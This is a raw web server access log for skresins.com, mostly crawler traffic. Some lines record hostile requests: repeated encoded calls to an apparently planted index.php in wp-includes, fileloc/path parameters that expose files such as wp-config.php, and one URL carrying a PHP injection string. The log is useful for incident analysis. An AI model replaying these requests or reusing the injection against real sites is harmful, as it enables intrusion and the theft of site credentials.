103.86.176.173 - - [18/Sep/2025:07:21:09 +0530] "GET /wp-includes/js/dist/script-modules/interactivity/interactivity/index.php?ARRAY=7o2230223n313735383136333836392p2231223n22687474703n5p2s5p2s7n7335353976313373752r67656r656s6r2r6p61745p2s3s6p633q7068705s636s64655s6n6326743q313735383136303236392q3430376464313933353530393538656564356130323865613535623131313330222p2232223n226164383939636164653134313431333635313839613533643866336265633439222p2233223n223938383633363430623431383065623061613663653330623236356137346638222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232362q33332q35362q37302q37312q38382q3234227q HTTP/1.1" 500 567 "-" "-"
66.249.68.130 - - [18/Sep/2025:07:23:10 +0530] "GET /?_g=3098863 HTTP/1.1" 200 30389 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
85.208.96.212 - - [18/Sep/2025:07:23:13 +0530] "GET /lentillas-de-colores-baratas-valencia-k.html HTTP/1.1" 200 5854 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
216.73.216.0 - - [18/Sep/2025:07:23:15 +0530] "GET /robots.txt HTTP/2" 200 107 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.0 - - [18/Sep/2025:07:23:15 +0530] "GET /2004014312?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fskresins.com%2Fpublic_html%2Fwp-signup.php&path=%2Fvar%2Fwww%2Fvhosts%2Fskresins.com%2Fpublic_html HTTP/2" 200 11357 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
85.208.98.23 - - [18/Sep/2025:07:23:17 +0530] "GET /robots.txt HTTP/1.1" 200 667 "http://www.skresins.com/robots.txt" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
66.249.68.136 - - [18/Sep/2025:07:23:17 +0530] "GET /421080680?goods=0420515456 HTTP/1.1" 200 29968 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.136 - - [18/Sep/2025:07:23:19 +0530] "GET /1685397144?goods=1683132570 HTTP/1.1" 200 30558 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.136 - - [18/Sep/2025:07:23:24 +0530] "GET /?_gl=1*rgknbr*_ga*MzY3MjE1MDcwLjE3MzcwOTUyMjA.*_ga_0VKVKKN4NV*MTczNzEwMjM4NC4yLjEuMTczNzEwMjQ1My42MC4wLjA.&_bd_prev_page=https://www.skresins.com/detail.php?collections/111817592 HTTP/1.1" 200 30323 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.131 - - [18/Sep/2025:07:23:25 +0530] "GET /1127152160?goods=1125637915 HTTP/1.1" 200 21240 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
103.86.176.173 - - [18/Sep/2025:07:21:30 +0530] "GET /wp-includes/js/dist/script-modules/interactivity/interactivity/index.php?ARRAY=7o2230223n313735383136333839302p2231223n22687474703n5p2s5p2s7n7335353976313373752r67656r656s6r2r6p61745p2s3s6p633q7068705s636s64655s6n6326743q313735383136303239302q3638353833373466386633633662646135623939363331373165333734313636222p2232223n226164383939636164653134313431333635313839613533643866336265633439222p2233223n223938383633363430623431383065623061613663653330623236356137346638222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232362q33332q35362q37302q37312q38382q3234227q HTTP/1.1" 500 567 "-" "-"
66.249.68.136 - - [18/Sep/2025:07:23:30 +0530] "GET /1802010048?goods=1799588735 HTTP/1.1" 200 18890 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
85.208.98.20 - - [18/Sep/2025:07:23:32 +0530] "GET /hot-wheels-land-shark-k.html HTTP/1.1" 200 5879 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
57.141.4.33 - - [18/Sep/2025:07:23:40 +0530] "GET /993969184?fileloc=/var/www/vhosts/skresins.com/public_html/wp-config.php&path=/var/www/vhosts/skresins.com/public_html HTTP/2" 403 795 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
66.249.68.130 - - [18/Sep/2025:07:23:38 +0530] "GET /?_g=20500429 HTTP/1.1" 200 29172 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.130 - - [18/Sep/2025:07:23:40 +0530] "GET /?_g=5382429 HTTP/1.1" 200 19159 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
187.153.48.72 - - [18/Sep/2025:07:23:42 +0530] "GET /e/03/?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fskresins.com%2Fpublic_html%2Fwp-trackback.php&path=%2Fvar%2Fwww%2Fvhosts%2Fskresins.com%2Fpublic_html HTTP/1.1" 200 5526 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Brave Chrome/79.0.3945.88 Safari/537.36"
57.141.4.34 - - [18/Sep/2025:07:23:45 +0530] "GET /993813368?path=/var/www/vhosts HTTP/2" 200 12722 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
85.208.98.24 - - [18/Sep/2025:07:23:46 +0530] "GET /chalecos-gap-k.html HTTP/1.1" 200 6070 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
66.249.68.136 - - [18/Sep/2025:07:23:46 +0530] "GET /1663534552?goods=1661299362 HTTP/1.1" 200 29265 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
103.86.176.173 - - [18/Sep/2025:07:21:51 +0530] "GET /wp-includes/js/dist/script-modules/interactivity/interactivity/index.php?ARRAY=7o2230223n313735383136333931312p2231223n22687474703n5p2s5p2s7n7335353976313373752r67656r656s6r2r6p61745p2s3s6p633q7068705s636s64655s6n6326743q313735383136303331312q3735643831383833393039386533306131396565653431323137623231326262222p2232223n226164383939636164653134313431333635313839613533643866336265633439222p2233223n223938383633363430623431383065623061613663653330623236356137346638222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232362q33332q35362q37302q37312q38382q3234227q HTTP/1.1" 500 567 "-" "-"
85.208.96.211 - - [18/Sep/2025:07:23:52 +0530] "GET /jogue-sunny-coin-hold-the-spin-casinos-de-forma-gratuita-slots-online-da-wms/ HTTP/1.1" 200 6059 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
66.249.68.136 - - [18/Sep/2025:07:23:50 +0530] "GET /392614280?goods=0392087316 HTTP/1.1" 200 29399 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.0 - - [18/Sep/2025:07:23:54 +0530] "GET /2004372456?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fskresins.com%2Fpublic_html%2Fwp-load.php&path=%2Fvar%2Fwww%2Fvhosts%2Fskresins.com%2Fpublic_html HTTP/2" 200 4314 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
57.141.4.25 - - [18/Sep/2025:07:23:57 +0530] "GET /993479032?fileloc=/var/www/vhosts/skresins.com/public_html/wp-config-sample.php&path=/var/www/vhosts/skresins.com/public_html HTTP/2" 200 16203 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
66.249.68.136 - - [18/Sep/2025:07:24:00 +0530] "GET /803779464?goods=0802699860 HTTP/1.1" 200 30200 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
206.43.198.70 - - [18/Sep/2025:07:24:03 +0530] "GET /les-probabilites-au-coeur-des-jeux-de-casino-action/?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fskresins.com%2Fpublic_html%2Fwp-includes%2Fcache.php&path=%2Fvar%2Fwww%2Fvhosts%2Fskresins.com%2Fpublic_html%2Fwp-includes HTTP/1.1" 200 6409 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_2) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1309.0 Safari/537.17"
57.141.4.43 - - [18/Sep/2025:07:24:03 +0530] "GET /993457800?fileloc=/var/www/vhosts/skresins.com/public_html/item.php&path=/var/www/vhosts/skresins.com/public_html HTTP/2" 200 14643 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
66.249.68.137 - - [18/Sep/2025:07:24:06 +0530] "GET /738978128?goods=0737985621 HTTP/1.1" 200 29413 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
57.141.4.7 - - [18/Sep/2025:07:24:11 +0530] "GET /689817184?goods=0688890755 HTTP/2" 200 73710 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
103.86.176.173 - - [18/Sep/2025:07:22:12 +0530] "GET /wp-includes/js/dist/script-modules/interactivity/interactivity/index.php?ARRAY=7o2230223n313735383136333933322p2231223n22687474703n5p2s5p2s7n7335353976313373752r67656r656s6r2r6p61745p2s3s6p633q7068705s636s64655s6n6326743q313735383136303333322q3030353132353939353432333034353566313235366235636461663132326665222p2232223n226164383939636164653134313431333635313839613533643866336265633439222p2233223n223938383633363430623431383065623061613663653330623236356137346638222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232362q33332q35362q37302q37312q38382q3234227q HTTP/1.1" 500 567 "-" "-"
66.249.68.130 - - [18/Sep/2025:07:24:11 +0530] "GET /?_g=26990885 HTTP/1.1" 200 29462 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
14.245.228.203 - - [18/Sep/2025:07:24:14 +0530] "GET /avis-professionnel-sur-leonbet-casino/?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fskresins.com%2Fpublic_html%2Fwp-includes%2Fclass-wp-duotone.php&path=%2Fvar%2Fwww%2Fvhosts%2Fskresins.com%2Fpublic_html%2Fwp-includes HTTP/1.1" 200 14902 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11_2_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82 Safari/537.36"
85.208.96.205 - - [18/Sep/2025:07:24:15 +0530] "GET /jarra-de-borosilicato-k.html HTTP/1.1" 200 6059 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
66.249.68.136 - - [18/Sep/2025:07:24:13 +0530] "GET /1801994440?goods=1799573148 HTTP/1.1" 200 29381 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.0 - - [18/Sep/2025:07:24:17 +0530] "GET /605248592?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fskresins.com%2Fpublic_html%2Fwp-activate.php&path=%2Fvar%2Fwww%2Fvhosts%2Fskresins.com%2Fpublic_html HTTP/2" 200 5112 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
85.208.96.202 - - [18/Sep/2025:07:24:18 +0530] "GET /latex-amoniaco-k.html HTTP/1.1" 200 5814 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
85.208.98.19 - - [18/Sep/2025:07:24:18 +0530] "GET /cadeau-en-folie-k.html HTTP/1.1" 200 6016 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
57.141.4.62 - - [18/Sep/2025:07:24:20 +0530] "GET /689939472?goods=0689012877 HTTP/2" 200 73710 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
185.191.171.11 - - [18/Sep/2025:07:24:21 +0530] "GET /juegue-miami-beach-online-wazdan-descargar-la-aplicacion-gate777-online-slots/ HTTP/1.1" 200 5947 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
66.249.68.136 - - [18/Sep/2025:07:23:36 +0530] "GET /desktop-power-switch-button-assembly-0kcrv8-dell-inspiron-660-620-RUFAHkRZQVJAWFpF?fileloc=/var/www/vhosts/skresins.com/public_html/pages.php?collections/11825032 HTTP/1.1" 200 19175 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
85.208.96.212 - - [18/Sep/2025:07:24:24 +0530] "GET /teclado-cadeve-k.html HTTP/1.1" 200 6033 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
47.128.118.77 - - [18/Sep/2025:07:24:25 +0530] "GET /cosmetic-industries/%27;%20echo%20get_option(%27home%27);%20echo%20%27?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fskresins.com%2Fpublic_html%2Fclick.php&path=%2Fvar%2Fwww%2Fvhosts%2Fskresins.com%2Fpublic_html HTTP/2" 200 3506 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
66.249.68.131 - - [18/Sep/2025:07:24:24 +0530] "GET /?_g=13670052 HTTP/1.1" 200 29818 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
179.218.16.108 - - [18/Sep/2025:07:24:28 +0530] "GET /2553105 HTTP/1.1" 200 5884 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36"
185.191.171.6 - - [18/Sep/2025:07:24:30 +0530] "GET /velero-backup-pvc-k.html HTTP/1.1" 200 6033 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
66.249.68.136 - - [18/Sep/2025:07:24:29 +0530] "GET /1663552816?goods=1661317601 HTTP/1.1" 200 29444 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
85.208.98.29 - - [18/Sep/2025:07:24:31 +0530] "GET /cadeau-de-folie-k.html HTTP/1.1" 200 6070 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
103.86.176.173 - - [18/Sep/2025:07:22:33 +0530] "GET /wp-includes/js/dist/script-modules/interactivity/interactivity/index.php?ARRAY=7o2230223n313735383136333935332p2231223n22687474703n5p2s5p2s7n7335353976313373752r67656r656s6r2r6p61745p2s3s6p633q7068705s636s64655s6n6326743q313735383136303335332q3161616539653864316631313566383239653561363163376531626564633165222p2232223n226164383939636164653134313431333635313839613533643866336265633439222p2233223n223938383633363430623431383065623061613663653330623236356137346638222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232362q33332q35362q37302q37312q38382q3234227q HTTP/1.1" 500 567 "-" "-"
66.249.68.130 - - [18/Sep/2025:07:24:32 +0530] "GET /?_g=8576596 HTTP/1.1" 200 29197 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
185.191.171.6 - - [18/Sep/2025:07:24:34 +0530] "GET /harry-clarke-illustration-showcase-k.html HTTP/1.1" 200 6033 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
66.249.68.136 - - [18/Sep/2025:07:24:33 +0530] "GET /?_gl=1*rgknbr*_ga*MzY3MjE1MDcwLjE3MzcwOTUyMjA.*_ga_0VKVKKN4NV*MTczNzEwMjM4NC4yLjEuMTczNzEwMjQ1My42MC4wLjA.&_bd_prev_page=https://www.skresins.com/detail.php?guide/knowledge/payment.html HTTP/1.1" 200 29589 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.136 - - [18/Sep/2025:07:24:34 +0530] "GET /1685380712?goods=1683116160 HTTP/1.1" 200 29963 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
185.191.171.8 - - [18/Sep/2025:07:24:38 +0530] "GET /yogurt-bowls-near-me-k.html HTTP/1.1" 200 5817 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
66.249.68.130 - - [18/Sep/2025:07:24:36 +0530] "GET /?_g=26980430 HTTP/1.1" 200 30633 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.0 - - [18/Sep/2025:07:24:39 +0530] "GET /1775146656?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fskresins.com%2Fpublic_html%2Fwp-trackback.php&path=%2Fvar%2Fwww%2Fvhosts%2Fskresins.com%2Fpublic_html HTTP/2" 200 4444 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
85.208.98.24 - - [18/Sep/2025:07:24:40 +0530] "GET /campo-de-nerf-k.html HTTP/1.1" 200 5907 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
66.249.68.136 - - [18/Sep/2025:07:24:40 +0530] "GET /803768920?goods=0802689330 HTTP/1.1" 200 19372 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
114.119.142.208 - - [18/Sep/2025:07:24:38 +0530] "GET /search.php?m280017818?srsltid=AfmBOoPlXjjguQbIgJExdP_hvpAuYc4ot_jKLk2Dzn-C-S7TcnbVZi HTTP/1.1" 200 24191 "https://skresins.com/search.php?sitemap696.xml" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
66.249.68.130 - - [18/Sep/2025:07:24:43 +0530] "GET /?_g=14265474 HTTP/1.1" 200 29155 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.136 - - [18/Sep/2025:07:24:45 +0530] "GET /392643912?goods=0392116908 HTTP/1.1" 200 29839 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
85.208.98.31 - - [18/Sep/2025:07:24:48 +0530] "GET /anti-woke-law-k.html HTTP/1.1" 200 6070 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
85.208.98.19 - - [18/Sep/2025:07:24:48 +0530] "GET /high-puff-k.html HTTP/1.1" 200 6070 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
85.208.98.22 - - [18/Sep/2025:07:24:48 +0530] "GET /stop-woke-act-k.html HTTP/1.1" 200 6094 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
66.249.68.130 - - [18/Sep/2025:07:24:46 +0530] "GET /?_g=25754285 HTTP/1.1" 200 29964 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
185.191.171.2 - - [18/Sep/2025:07:24:50 +0530] "GET /plafon-18-watts-k.html HTTP/1.1" 200 6033 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
66.249.68.136 - - [18/Sep/2025:07:24:49 +0530] "GET /803780256?goods=0802700651 HTTP/1.1" 200 29192 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
45.188.78.161 - - [18/Sep/2025:07:24:52 +0530] "GET /rapport-detaille-sur-leonbet/?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fskresins.com%2Fpublic_html%2Fwp-config-sample.php&path=%2Fvar%2Fwww%2Fvhosts%2Fskresins.com%2Fpublic_html HTTP/1.1" 200 4822 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11_1_0) AppleWebKit/537.36 (KHTML, like Gecko) Brave Chrome/88.0.4324.96 Safari/537.36"
66.249.68.136 - - [18/Sep/2025:07:24:52 +0530] "GET /ctg/search/similarImageSearchResultView/?ctgItemCd=1960463 HTTP/1.1" 200 30096 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; GoogleOther)"
103.86.176.173 - - [18/Sep/2025:07:22:54 +0530] "GET /wp-includes/js/dist/script-modules/interactivity/interactivity/index.php?ARRAY=7o2230223n313735383136333937342p2231223n22687474703n5p2s5p2s7n7335353976313373752r67656r656s6r2r6p61745p2s3s6p633q7068705s636s64655s6n6326743q313735383136303337342q3562613737646538313661633636663362653936303835656431373434396463222p2232223n226164383939636164653134313431333635313839613533643866336265633439222p2233223n223938383633363430623431383065623061613663653330623236356137346638222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232362q33332q35362q37302q37312q38382q3234227q HTTP/1.1" 500 567 "-" "-"
185.191.171.4 - - [18/Sep/2025:07:24:56 +0530] "GET /jwt-chrome-extension-k.html HTTP/1.1" 200 6033 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
66.249.68.130 - - [18/Sep/2025:07:24:55 +0530] "GET /?_g=11318674 HTTP/1.1" 200 18952 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.130 - - [18/Sep/2025:07:25:00 +0530] "GET /?_g=7415374 HTTP/1.1" 200 18993 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.136 - - [18/Sep/2025:07:24:59 +0530] "GET /1158279032?goods=1156722950 HTTP/1.1" 200 30317 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
85.208.98.20 - - [18/Sep/2025:07:25:02 +0530] "GET /hot-wheels-le-mans-k.html HTTP/1.1" 200 5997 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
85.208.98.31 - - [18/Sep/2025:07:25:02 +0530] "GET /hp-t600-plotter-k.html HTTP/1.1" 200 6016 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
85.208.98.22 - - [18/Sep/2025:07:25:02 +0530] "GET /rg405-k.html HTTP/1.1" 200 6016 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
85.208.98.23 - - [18/Sep/2025:07:25:04 +0530] "GET /robots.txt HTTP/1.1" 200 667 "http://www.skresins.com/robots.txt" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
66.249.68.136 - - [18/Sep/2025:07:25:04 +0530] "GET /1158270832?goods=1156714761 HTTP/1.1" 200 30727 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
177.154.172.47 - - [18/Sep/2025:07:25:08 +0530] "GET /9337764 HTTP/1.1" 200 5989 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36"
66.249.68.131 - - [18/Sep/2025:07:25:06 +0530] "GET /?_g=17017307 HTTP/1.1" 200 29311 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.136 - - [18/Sep/2025:07:25:11 +0530] "GET /1801989920?goods=1799568635 HTTP/1.1" 200 30025 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.0 - - [18/Sep/2025:07:25:13 +0530] "GET /852694128?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fskresins.com%2Fpublic_html%2Fwp-signup.php&path=%2Fvar%2Fwww%2Fvhosts%2Fskresins.com%2Fpublic_html HTTP/2" 200 11401 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
